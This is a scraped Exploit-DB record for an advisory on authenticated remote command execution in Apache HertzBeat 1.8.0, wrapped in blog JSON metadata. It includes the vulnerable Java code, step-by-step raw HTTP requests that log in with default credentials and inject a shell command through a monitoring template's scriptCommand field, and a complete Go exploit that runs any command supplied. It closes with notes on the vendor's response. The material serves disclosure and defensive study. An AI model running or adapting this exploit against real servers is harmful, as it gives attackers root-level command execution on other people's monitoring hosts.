{“lastseen”:”2026-05-14T13:28:58″,”description”:”Exploit Title: Apache HertzBeat 1.8.0 – Remote Code Execution Google Dork: N\/A Date: 2026-03-09 Exploit Author: Brett Gervasoni Vendor Homepage: https:\/\/hertzbeat.apache.org\/ Software Link: https:\/\/github.com\/apache\/hertzbeat\/releases Version: 1.8.0…”,”published”:”2026-05-14T00:00:00″,”modified”:”2026-05-14T00:00:00″,”type”:”exploitdb”,”title”:”Apache HertzBeat 1.8.0 – Remote Code Execution”,”source”:””,”references”:””,”id”:”EDB-ID:52563″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Exploit Title: Apache HertzBeat 1.8.0 – Remote Code Execution \\r\\n# Google Dork: N\/A\\r\\n# Date: 2026-03-09\\r\\n# Exploit Author: Brett Gervasoni\\r\\n# Vendor Homepage: https:\/\/hertzbeat.apache.org\/\\r\\n# Software Link: https:\/\/github.com\/apache\/hertzbeat\/releases\\r\\n# Version: 1.8.0\\r\\n# Tested on: Linux (Docker; official HertzBeat image, uid=0 in container)\\r\\n# CVE: N\/A\\r\\n\\r\\n================================================================================\\r\\nMETADATA\\r\\n================================================================================\\r\\n\\r\\nSeverity: CRITICAL\\r\\nImpact: Arbitrary command execution via monitoring template (script protocol)\\r\\nCWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)\\r\\nProduct: Apache HertzBeat \u2014 https:\/\/hertzbeat.apache.org\/ (v1.8.0)\\r\\nAffected Component: ScriptCollectImpl.collect()\\r\\nAffected Endpoint: PUT \/api\/apps\/define\/yml\\r\\nAuthentication: Required (standard user or admin)\\r\\n\\r\\nNote: Apache Security does not classify this as a vulnerability; see HertzBeat\\r\\nsecurity model: https:\/\/hertzbeat.apache.org\/docs\/help\/security_model\/\\r\\n\\r\\n================================================================================\\r\\nVULNERABILITY SUMMARY\\r\\n================================================================================\\r\\n\\r\\nHertzBeat allows arbitrary OS commands to be executed via the scriptCommand\\r\\nparameter in a monitoring template definition.\\r\\n\\r\\nAn authenticated user can overwrite a monitoring template definition via\\r\\nPUT \/api\/apps\/define\/yml. The \\”define\\” body contains YAML parsed into a Job.\\r\\nWhen the YAML specifies protocol: script, the attacker-controlled scriptCommand\\r\\nstring is passed to ProcessBuilder (bash -c \\”\\u003ccommand\\u003e\\”) without sanitization.\\r\\n\\r\\nIf the overwritten template has active monitoring instances, updateAppCollectJob()\\r\\nre-dispatches them, triggering execution within seconds. If none exist, the\\r\\nattacker can create one via POST \/api\/monitor to trigger immediate execution.\\r\\n\\r\\nThe default Docker deployment runs the process as root (uid=0).\\r\\n\\r\\n================================================================================\\r\\nVULNERABLE CODE (REFERENCE)\\r\\n================================================================================\\r\\n\\r\\nSink \u2014 ScriptCollectImpl.java (approx. lines 74\u2013114) \u2014 direct execution:\\r\\n\\r\\n public void collect(CollectRep.MetricsData.Builder builder, Metrics metrics) {\\r\\n ScriptProtocol scriptProtocol = metrics.getScript();\\r\\n \/\/ …\\r\\n if (StringUtils.hasText(scriptProtocol.getScriptCommand())) {\\r\\n switch (scriptProtocol.getScriptTool()) {\\r\\n case BASH -\\u003e processBuilder = new ProcessBuilder(\\r\\n BASH, BASH_C, scriptProtocol.getScriptCommand().trim()); \/\/ payload\\r\\n \/\/ …\\r\\n }\\r\\n }\\r\\n \/\/ …\\r\\n Process process = processBuilder.start(); \/\/ executed\\r\\n }\\r\\n\\r\\nYAML gadget blocking \u2014 AppController.java (approx. 55\u201359) \u2014 blocks SnakeYAML\\r\\ngadget strings, not shell command injection:\\r\\n\\r\\n private static final String[] RISKY_STR_ARR = {\\”ScriptEngineManager\\”, \\”URLClassLoader\\”, \\”!!\\”,\\r\\n \\”ClassLoader\\”, \\”AnnotationConfigApplicationContext\\”, \\”FileSystemXmlApplicationContext\\”,\\r\\n \\”GenericXmlApplicationContext\\”, \\”GenericGroovyApplicationContext\\”, \\”GroovyScriptEngine\\”,\\r\\n \\”GroovyClassLoader\\”, \\”GroovyShell\\”, \\”ScriptEngine\\”, \\”ScriptEngineFactory\\”,\\r\\n \\”XmlWebApplicationContext\\”, \\”ClassPathXmlApplicationContext\\”, \\”MarshalOutputStream\\”,\\r\\n \\”InflaterOutputStream\\”, \\”FileOutputStream\\”};\\r\\n\\r\\n================================================================================\\r\\nPROOF OF CONCEPT \u2014 RAW HTTP\\r\\n================================================================================\\r\\n\\r\\nReplace TARGET with the HertzBeat host. Default port is 1157. Example uses a\\r\\nstandard user \\”operator\\” \/ \\”hertzbeat\\” (user role); admin with default\\r\\npassword also works.\\r\\n\\r\\n— Step 1: Authenticate —\\r\\n\\r\\nPOST \/api\/account\/auth\/form HTTP\/1.1\\r\\nHost: TARGET:1157\\r\\nContent-Type: application\/json\\r\\n\\r\\n{\\”type\\”:1,\\”identifier\\”:\\”operator\\”,\\”credential\\”:\\”hertzbeat\\”}\\r\\n\\r\\nResponse: data.token (JWT) \u2014 use as Bearer below.\\r\\n\\r\\n— Step 2: Overwrite linux_script template —\\r\\n\\r\\nPUT \/api\/apps\/define\/yml HTTP\/1.1\\r\\nHost: TARGET:1157\\r\\nAuthorization: Bearer \\u003cJWT\\u003e\\r\\nContent-Type: application\/json\\r\\n\\r\\n{\\”define\\”:\\”app: linux_script\\\\ncategory: os\\\\nname:\\\\n en-US: Linux Script\\\\n zh-CN: Linux Script\\\\nparams:\\\\n – field: host\\\\n name:\\\\n en-US: Host\\\\n zh-CN: Host\\\\n type: host\\\\n required: true\\\\nmetrics:\\\\n – name: basic\\\\n i18n:\\\\n en-US: Basic\\\\n zh-CN: Basic\\\\n priority: 0\\\\n fields:\\\\n – field: result\\\\n type: 1\\\\n i18n:\\\\n en-US: Result\\\\n zh-CN: Result\\\\n protocol: script\\\\n script:\\\\n scriptTool: bash\\\\n charset: UTF-8\\\\n scriptCommand: id \\u003e \/tmp\/pwned\\\\n parseType: multiRow\\\\n\\”}\\r\\n\\r\\nDecoded define (YAML):\\r\\n\\r\\napp: linux_script\\r\\ncategory: os\\r\\nname:\\r\\n en-US: Linux Script\\r\\n zh-CN: Linux Script\\r\\nparams:\\r\\n – field: host\\r\\n name:\\r\\n en-US: Host\\r\\n zh-CN: Host\\r\\n type: host\\r\\n required: true\\r\\nmetrics:\\r\\n – name: basic\\r\\n i18n:\\r\\n en-US: Basic\\r\\n zh-CN: Basic\\r\\n priority: 0\\r\\n fields:\\r\\n – field: result\\r\\n type: 1\\r\\n i18n:\\r\\n en-US: Result\\r\\n zh-CN: Result\\r\\n protocol: script\\r\\n script:\\r\\n scriptTool: bash\\r\\n charset: UTF-8\\r\\n scriptCommand: id \\u003e \/tmp\/pwned\\r\\n parseType: multiRow\\r\\n\\r\\nExpected response:\\r\\n\\r\\nHTTP\/1.1 200 OK\\r\\nContent-Type: application\/json\\r\\n\\r\\n{\\”code\\”:0,\\”msg\\”:null,\\”data\\”:null}\\r\\n\\r\\n— Step 3: Create monitor (if no linux_script monitors exist) —\\r\\n\\r\\nPOST \/api\/monitor HTTP\/1.1\\r\\nHost: TARGET:1157\\r\\nAuthorization: Bearer \\u003cJWT\\u003e\\r\\nContent-Type: application\/json\\r\\n\\r\\n{\\”monitor\\”:{\\”name\\”:\\”rce-test\\”,\\”app\\”:\\”linux_script\\”,\\”host\\”:\\”127.0.0.1\\”,\\”intervals\\”:30,\\”status\\”:1},\\”params\\”:[{\\”field\\”:\\”host\\”,\\”paramValue\\”:\\”127.0.0.1\\”,\\”type\\”:1}]}\\r\\n\\r\\n— Step 4: Verify (example: Docker) —\\r\\n\\r\\ndocker exec hertzbeat cat \/tmp\/pwned\\r\\n\\r\\nExpected:\\r\\n\\r\\nuid=0(root) gid=0(root) groups=0(root)\\r\\n\\r\\n================================================================================\\r\\nEXPLOIT CODE \u2014 script_command_rce.go (Go)\\r\\n================================================================================\\r\\n\\r\\npackage main\\r\\n\\r\\nimport (\\r\\n\\t\\”bytes\\”\\r\\n\\t\\”encoding\/json\\”\\r\\n\\t\\”fmt\\”\\r\\n\\t\\”io\\”\\r\\n\\t\\”math\/rand\\”\\r\\n\\t\\”net\/http\\”\\r\\n\\t\\”os\\”\\r\\n\\t\\”strings\\”\\r\\n)\\r\\n\\r\\nconst target = \\”http:\/\/localhost:1157\\”\\r\\n\\r\\ntype authResponse struct {\\r\\n\\tCode int `json:\\”code\\”`\\r\\n\\tData struct {\\r\\n\\t\\tToken string `json:\\”token\\”`\\r\\n\\t} `json:\\”data\\”`\\r\\n}\\r\\n\\r\\ntype apiResponse struct {\\r\\n\\tCode int `json:\\”code\\”`\\r\\n\\tMsg string `json:\\”msg\\”`\\r\\n}\\r\\n\\r\\nfunc main() {\\r\\n\\tif len(os.Args) \\u003c 2 {\\r\\n\\t\\tfmt.Fprintf(os.Stderr, \\”Usage: %s \\u003ccommand\\u003e\\\\n\\”, os.Args[0])\\r\\n\\t\\tfmt.Fprintf(os.Stderr, \\”Example: %s \\\\\\”id \\u003e \/tmp\/pwned\\\\\\”\\\\n\\”, os.Args[0])\\r\\n\\t\\tos.Exit(1)\\r\\n\\t}\\r\\n\\tcmd := strings.Join(os.Args[1:], \\” \\”)\\r\\n\\r\\n\\tfmt.Println(\\”============================================================\\”)\\r\\n\\tfmt.Println(\\” HertzBeat ScriptCollectImpl RCE\\”)\\r\\n\\tfmt.Println(\\”============================================================\\”)\\r\\n\\tfmt.Println()\\r\\n\\r\\n\\tfmt.Println(\\”[*] Authenticating…\\”)\\r\\n\\r\\n\\ttoken, err := authenticate()\\r\\n\\tif err != nil {\\r\\n\\t\\tfmt.Fprintf(os.Stderr, \\”[-] Auth failed: %v\\\\n\\”, err)\\r\\n\\t\\tos.Exit(1)\\r\\n\\t}\\r\\n\\r\\n\\tfmt.Printf(\\”[+] Got token: %s…\\\\n\\\\n\\”, token[:40])\\r\\n\\r\\n\\tfmt.Println(\\”[*] Overwriting linux_script template…\\”)\\r\\n\\tfmt.Printf(\\” PUT \/api\/apps\/define\/yml\\\\n\\”)\\r\\n\\tfmt.Printf(\\” scriptCommand: %s\\\\n\\”, cmd)\\r\\n\\r\\n\\terr = putMaliciousDefine(token, cmd)\\r\\n\\tif err != nil {\\r\\n\\t\\tfmt.Fprintf(os.Stderr, \\”[-] Failed to overwrite template: %v\\\\n\\”, err)\\r\\n\\t\\tos.Exit(1)\\r\\n\\t}\\r\\n\\r\\n\\tfmt.Println(\\”[+] Template overwritten.\\”)\\r\\n\\tfmt.Println()\\r\\n\\r\\n\\tfmt.Println(\\”[*] Creating monitor instance to trigger collection…\\”)\\r\\n\\tfmt.Println(\\” POST \/api\/monitor with app: linux_script\\”)\\r\\n\\r\\n\\terr = createMonitor(token)\\r\\n\\tif err != nil {\\r\\n\\t\\tfmt.Fprintf(os.Stderr, \\”[-] Failed to create monitor: %v\\\\n\\”, err)\\r\\n\\t\\tfmt.Println(\\”[*] This may fail if a monitor already exists \u2014 checking anyway…\\”)\\r\\n\\t} else {\\r\\n\\t\\tfmt.Println(\\”[+] Monitor created.\\”)\\r\\n\\t\\tfmt.Println()\\r\\n\\t}\\r\\n\\r\\n\\tfmt.Println(\\”[+] Completed. If it wasn’t executed instantly, wait ~30 seconds for the collector.\\”)\\r\\n\\tfmt.Printf(\\”[+] Command: %s\\\\n\\\\n\\”, cmd)\\r\\n\\tfmt.Println(\\”[*] Verify with (assuming its running in docker locally):\\”)\\r\\n\\tfmt.Println(\\” docker exec hertzbeat \\u003ccheck your payload\\u003e\\”)\\r\\n}\\r\\n\\r\\nfunc authenticate() (string, error) {\\r\\n\\tbody := `{\\”type\\”:1,\\”identifier\\”:\\”operator\\”,\\”credential\\”:\\”hertzbeat\\”}`\\r\\n\\r\\n\\tresp, err := http.Post(target+\\”\/api\/account\/auth\/form\\”, \\”application\/json\\”, bytes.NewBufferString(body))\\r\\n\\tif err != nil {\\r\\n\\t\\treturn \\”\\”, err\\r\\n\\t}\\r\\n\\r\\n\\tdefer resp.Body.Close()\\r\\n\\r\\n\\tvar result authResponse\\r\\n\\tif err := json.NewDecoder(resp.Body).Decode(\\u0026result); err != nil {\\r\\n\\t\\treturn \\”\\”, err\\r\\n\\t}\\r\\n\\r\\n\\tif result.Code != 0 || result.Data.Token == \\”\\” {\\r\\n\\t\\treturn \\”\\”, fmt.Errorf(\\”unexpected response code %d\\”, result.Code)\\r\\n\\t}\\r\\n\\r\\n\\treturn result.Data.Token, nil\\r\\n}\\r\\n\\r\\nfunc putMaliciousDefine(token, command string) error {\\r\\n\\tdefine := fmt.Sprintf(`app: linux_script\\r\\ncategory: os\\r\\nname:\\r\\n en-US: Linux Script\\r\\n zh-CN: Linux Script\\r\\nparams:\\r\\n – field: host\\r\\n name:\\r\\n en-US: Host\\r\\n zh-CN: Host\\r\\n type: host\\r\\n required: true\\r\\nmetrics:\\r\\n – name: basic\\r\\n i18n:\\r\\n en-US: Basic\\r\\n zh-CN: Basic\\r\\n priority: 0\\r\\n fields:\\r\\n – field: result\\r\\n type: 1\\r\\n i18n:\\r\\n en-US: Result\\r\\n zh-CN: Result\\r\\n protocol: script\\r\\n script:\\r\\n scriptTool: bash\\r\\n charset: UTF-8\\r\\n scriptCommand: \\”%s \\u0026\\u0026 echo result done\\”\\r\\n parseType: multiRow\\r\\n`, command)\\r\\n\\r\\n\\tpayload, _ := json.Marshal(map[string]string{\\”define\\”: define})\\r\\n\\r\\n\\treq, _ := http.NewRequest(\\”PUT\\”, target+\\”\/api\/apps\/define\/yml\\”, bytes.NewBuffer(payload))\\r\\n\\treq.Header.Set(\\”Content-Type\\”, \\”application\/json\\”)\\r\\n\\treq.Header.Set(\\”Authorization\\”, \\”Bearer \\”+token)\\r\\n\\r\\n\\tresp, err := http.DefaultClient.Do(req)\\r\\n\\tif err != nil {\\r\\n\\t\\treturn err\\r\\n\\t}\\r\\n\\r\\n\\tdefer resp.Body.Close()\\r\\n\\r\\n\\trespBody, _ := io.ReadAll(resp.Body)\\r\\n\\r\\n\\tvar result apiResponse\\r\\n\\tif err := json.Unmarshal(respBody, \\u0026result); err != nil {\\r\\n\\t\\treturn fmt.Errorf(\\”HTTP %d: %s\\”, resp.StatusCode, string(respBody))\\r\\n\\t}\\r\\n\\r\\n\\tif result.Code != 0 {\\r\\n\\t\\treturn fmt.Errorf(\\”API error (code %d): %s\\”, result.Code, result.Msg)\\r\\n\\t}\\r\\n\\r\\n\\treturn nil\\r\\n}\\r\\n\\r\\nfunc createMonitor(token string) error {\\r\\n\\tsuffix := randSuffix()\\r\\n\\tname := fmt.Sprintf(\\”rce-poc-%s\\”, suffix)\\r\\n\\tbody := fmt.Sprintf(`{\\”monitor\\”:{\\”name\\”:\\”%s\\”,\\”app\\”:\\”linux_script\\”,\\”host\\”:\\”127.0.0.1\\”,\\”intervals\\”:30,\\”status\\”:1},\\”params\\”:[{\\”field\\”:\\”host\\”,\\”paramValue\\”:\\”127.0.0.1\\”,\\”type\\”:1}]}`, name)\\r\\n\\r\\n\\treq, _ := http.NewRequest(\\”POST\\”, target+\\”\/api\/monitor\\”, bytes.NewBufferString(body))\\r\\n\\treq.Header.Set(\\”Content-Type\\”, \\”application\/json\\”)\\r\\n\\treq.Header.Set(\\”Authorization\\”, \\”Bearer \\”+token)\\r\\n\\r\\n\\tresp, err := http.DefaultClient.Do(req)\\r\\n\\tif err != nil {\\r\\n\\t\\treturn err\\r\\n\\t}\\r\\n\\r\\n\\tdefer resp.Body.Close()\\r\\n\\r\\n\\trespBody, _ := io.ReadAll(resp.Body)\\r\\n\\tvar result apiResponse\\r\\n\\tif err := json.Unmarshal(respBody, \\u0026result); err != nil {\\r\\n\\t\\treturn fmt.Errorf(\\”HTTP %d: %s\\”, resp.StatusCode, string(respBody))\\r\\n\\t}\\r\\n\\r\\n\\tif result.Code != 0 {\\r\\n\\t\\treturn fmt.Errorf(\\”API error (code %d): %s\\”, result.Code, result.Msg)\\r\\n\\t}\\r\\n\\treturn nil\\r\\n}\\r\\n\\r\\nfunc randSuffix() string {\\r\\n\\tconst chars = \\”abcdefghijklmnopqrstuvwxyz0123456789\\”\\r\\n\\tb := make([]byte, 8)\\r\\n\\r\\n\\tfor i := range b {\\r\\n\\t\\tb[i] = chars[rand.Intn(len(chars))]\\r\\n\\t}\\r\\n\\r\\n\\treturn string(b)\\r\\n}\\r\\n\\r\\n================================================================================\\r\\nNOTES\\r\\n================================================================================\\r\\n\\r\\n- A standard user (e.g. operator:hertzbeat, user role) is sufficient; admin is\\r\\n not required for the described flow.\\r\\n- A new custom app name (e.g. app: rce_custom) can be registered with POST\\r\\n instead of PUT to avoid overwriting an existing definition; then create a\\r\\n monitor for that app.\\r\\n\\r\\n================================================================================\\r\\nDISCLOSURE \/ VENDOR RESPONSE (SUMMARY)\\r\\n================================================================================\\r\\n\\r\\nApache Security indicated this aligns with the documented security model: only\\r\\ntrusted operators should receive accounts; customization is intentional.\\r\\nRole-based permission controls are still evolving; see vendor documentation.\\r\\n\\r\\nReporting timeline:\\r\\n- 2026-02-19: Reported to Apache Security\\r\\n- 2026-02-19 to 2026-03-04: Discussion on post-authentication issues\\r\\n- 2026-03-04: Apache position communicated (risk accepted per security model)\\r\\n- 2026-03-09: Public advisory”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52563″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52563″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-14T13:28:58″,”description”:”Exploit Title: Apache HertzBeat 1.8.0 – Remote Code Execution Google Dork: N\/A Date: 2026-03-09 Exploit Author: Brett Gervasoni Vendor Homepage: https:\/\/hertzbeat.apache.org\/ Software Link: https:\/\/github.com\/apache\/hertzbeat\/releases Version:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,40,13,33,7,11,5],"class_list":["post-54458","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-exploitdb","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n